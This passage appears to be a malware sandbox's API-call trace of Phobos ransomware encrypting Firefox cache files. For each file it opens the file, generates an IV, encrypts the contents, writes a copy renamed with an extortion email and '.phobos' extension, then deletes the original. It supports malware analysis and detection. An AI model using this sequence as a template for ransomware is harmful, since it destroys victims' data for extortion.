CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0193.423] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.423] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0193.423] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.423] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0193.423] CryptDestroyKey (hKey=0xa32d28) returned 1 [0193.423] CloseHandle (hObject=0x12c) returned 1 [0193.423] CloseHandle (hObject=0x14c) returned 1 [0193.423] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01")) returned 1 [0193.425] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0193.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0193.426] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=21327) returned 1 [0193.426] CloseHandle (hObject=0x14c) returned 1 [0193.426] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01")) returned 0x2020 [0193.426] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0193.426] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0193.426] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0193.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0193.427] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0193.427] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.427] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x534f, lpOverlapped=0x0) returned 1 [0193.437] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5350, dwBufLen=0x5350 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5350) returned 1 [0193.437] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x5350, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x5350, lpOverlapped=0x0) returned 1 [0193.438] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0193.438] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.438] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0193.438] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.438] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0193.438] CryptDestroyKey (hKey=0xa32d28) returned 1 [0193.438] CloseHandle (hObject=0x14c) returned 1 [0193.438] CloseHandle (hObject=0x12c) returned 1 [0193.438] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01")) returned 1 [0193.439] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0193.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0193.441] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=78805) returned 1 [0193.441] CloseHandle (hObject=0x12c) returned 1 [0193.441] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01")) returned 0x2020 [0193.441] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0193.441] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0193.441] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0193.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0193.442] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0193.442] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.442] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x133d5, lpOverlapped=0x0) returned 1 [0193.469] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x133e0, dwBufLen=0x133e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x133e0) returned 1 [0193.470] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x133e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x133e0, lpOverlapped=0x0) returned 1 [0193.471] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0193.471] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.471] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0193.471] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.471] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0193.471] CryptDestroyKey (hKey=0xa32d28) returned 1 [0193.471] CloseHandle (hObject=0x12c) returned 1 [0193.472] CloseHandle (hObject=0x14c) returned 1 [0193.472] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01")) returned 1 [0193.473] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0193.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0193.474] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=43337) returned 1 [0193.474] CloseHandle (hObject=0x14c) returned 1 [0193.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01")) returned 0x2020 [0193.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0193.474] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0193.474] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0193.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0193.475] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0193.475] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.475] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xa949, lpOverlapped=0x0) returned 1 [0193.648] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa950, dwBufLen=0xa950 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa950) returned 1 [0193.649] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa950, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa950, lpOverlapped=0x0) returned 1 [0193.650] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0193.750] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.750] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0193.750] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.750] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0193.750] CryptDestroyKey (hKey=0xa32d28) returned 1 [0193.750] CloseHandle (hObject=0x14c) returned 1 [0193.750] CloseHandle (hObject=0x12c) returned 1 [0193.750] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01")) returned 1 [0193.751] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0193.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0193.752] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=137273) returned 1 [0193.752] CloseHandle (hObject=0x12c) returned 1 [0193.752] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01")) returned 0x2020 [0193.752] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0193.752] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0193.752] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0193.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0193.753] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0193.753] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.753] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x21839, lpOverlapped=0x0) returned 1 [0193.778] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x21840, dwBufLen=0x21840 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x21840) returned 1 [0193.792] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x21840, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x21840, lpOverlapped=0x0) returned 1 [0193.795] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0193.795] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.795] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0193.795] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.795] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0193.795] CryptDestroyKey (hKey=0xa32d28) returned 1 [0193.795] CloseHandle (hObject=0x12c) returned 1 [0193.795] CloseHandle (hObject=0x14c) returned 1 [0193.795] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01")) returned 1 [0193.799] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0193.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0193.800] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=33382) returned 1 [0193.800] CloseHandle (hObject=0x14c) returned 1 [0193.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01")) returned 0x2020 [0193.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0193.800] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0193.800] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0193.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js 